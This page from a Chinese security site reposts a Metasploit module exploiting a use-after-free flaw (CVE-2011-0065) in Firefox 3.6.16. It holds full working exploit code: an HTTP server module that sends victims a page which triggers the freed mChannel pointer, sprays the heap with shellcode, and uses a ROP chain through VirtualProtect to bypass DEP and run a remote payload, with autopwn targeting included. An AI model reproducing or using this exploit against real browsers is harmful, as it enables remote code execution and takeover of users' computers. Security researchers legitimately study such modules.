首頁 | 安全文章 | 安全工具 | Exploits | 本站原創 | 關于我們 | 網站地圖 | 安全論壇
  當前位置:主頁>安全文章>文章資料>Exploits>文章內容
Mozilla Firefox 3.6.16 mChannel use after free Exploit
來源:http://www.metasploit.com 作者:regenrecht 發布時間:2011-08-11  
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    #
    # This module acts as an HTTP server
    #
    include Msf::Exploit::Remote::HttpServer::HTML

    include Msf::Exploit::Remote::BrowserAutopwn
    autopwn_info({
        :ua_name => HttpClients::FF,
        :ua_minver => "3.6.16",
        :ua_maxver => "3.6.16",
        :os_name => OperatingSystems::WINDOWS,
        :javascript => true,
        :rank => NormalRanking,
    })

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Mozilla Firefox 3.6.16 mChannel use after free Exploit',
            'Description'    => %q{
                    This module exploits an use after free vulnerability in Mozilla
                Firefox 3.6.16. An OBJECT Element mChannel can be freed via the
                OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel
                becomes a dangling pointer and can be reused when setting the OBJECTs
                data attribute. (Discovered by regenrecht). This module uses heapspray
                with a minimal ROP chain to bypass DEP on Windows XP SP3
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'regenrecht',   #  discovery
                    'Rh0'    # wrote metasploit module
                ],
            'Version'        => '0.0',
            'References'     =>
                [
                    ['CVE',    '2011-0065'],
                    ['OSVDB',  '72085'],
                    ['URL',    'https://bugzilla.mozilla.org/show_bug.cgi?id=634986'],
                    ['URL',    'http://www.mozilla.org/security/announce/2011/mfsa2011-13.html']
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                    'InitialAutoRunScript' => 'migrate -f',
                },
            'Payload'        =>
                {
                    'Space'    => 1024,
                    'BadChars' => "",
                },
            'Targets'        =>
                [   # worked with 100% reliability
                    [ 'Firefox 3.6.16, Windows XP SP3 (VirtualBox 4)',
                        {
                            'Platform' => 'win',
                            'Arch' => ARCH_X86,
                        }
                    ],
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'May 10 2011'
            ))
    end

    def on_request_uri(cli, request)

        # Re-generate the payload
        return if ((p = regenerate_payload(cli).encoded) == nil)

        print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
        send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })

        # Handle the payload
        handler(cli)
    end

    def generate_html(payload)
        
        # DEP bypass
        custom_stack = [
            0x1052c871, # mov esp,[ecx] / mov edx,5c86c6ff add [eax],eax / xor eax,eax / pop esi / retN 0x8
            0x7c801ad4,     # VirtualProtect
            0xbeeff00d,
            0xbeeff00d,
            0x7c874413, # jmp esp
            0x0c0c0048, # start address
            0x00000400, # size 1024
            0x00000040, # Page EXECUTE_READ_WRITE
            0x0c0c0c00  # old protection
            ].pack("V*")
            
        payload_buf = ''
        payload_buf << custom_stack
        payload_buf << payload
        escaped_payload = Rex::Text.to_unescape(payload_buf)
        
        custom_js = %Q|
        
e = document.getElementById("d");
e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0)
fake_obj_addr = unescape("\\x0c%u0c0c")

// taken and modified from adobe_flashplayer_newfunction.rb
var sc = unescape("#{escaped_payload}")
var ret_addr = unescape("%u0024%u0c0c")
while(ret_addr.length+20+8 < 0x100000) {ret_addr += ret_addr}
var b = ret_addr.substring(0,(0x48-0x24)/2)
b += sc
b += ret_addr
var next = b.substring(0,0x10000/2)
while(next.length<0x800000) {next += next}
var again = next.substring(0,0x80000 - (0x1020-0x08)/2)
array = new Array()
for (n=0;n<0x1f0;n++){
    array[n] = again + sc
}

e.data = ""
        |
        
        return %Q|
<html>
<body>
<object id="d"><object>
<script type="text/javascript">
#{custom_js}
</script></body></html>
        |
    end

end

 
[推薦] [評論(0條)] [返回頂部] [打印本頁] [關閉窗口]  
匿名評論
評論內容:(不能超過250字,需審核后才會公布,請自覺遵守互聯網相關政策法規。
 §最新評論:
  熱點文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相關文章
·PXE exploit server
·Free CD to MP3 Converter 3.1 U
·Net112企業建站系統遍歷目錄和后
·HP JetDirect PJL Interface Uni
·Sun/Oracle GlassFish Server Au
·HP JetDirect PJL Query Executi
·FreeAmp 2.0.7 .fat Buffer Over
·LiteServe 2.81 PASV Command De
·ABBS Electronic Flashcards v2.
·Acoustica Mixcraft v1.00 Local
·ABBS Audio Media Player v3.0 B
·Excel SLYK Format Parsing Buff
  推薦廣告
CopyRight © 2002-2019 VFocuS.Net All Rights Reserved
期本期特码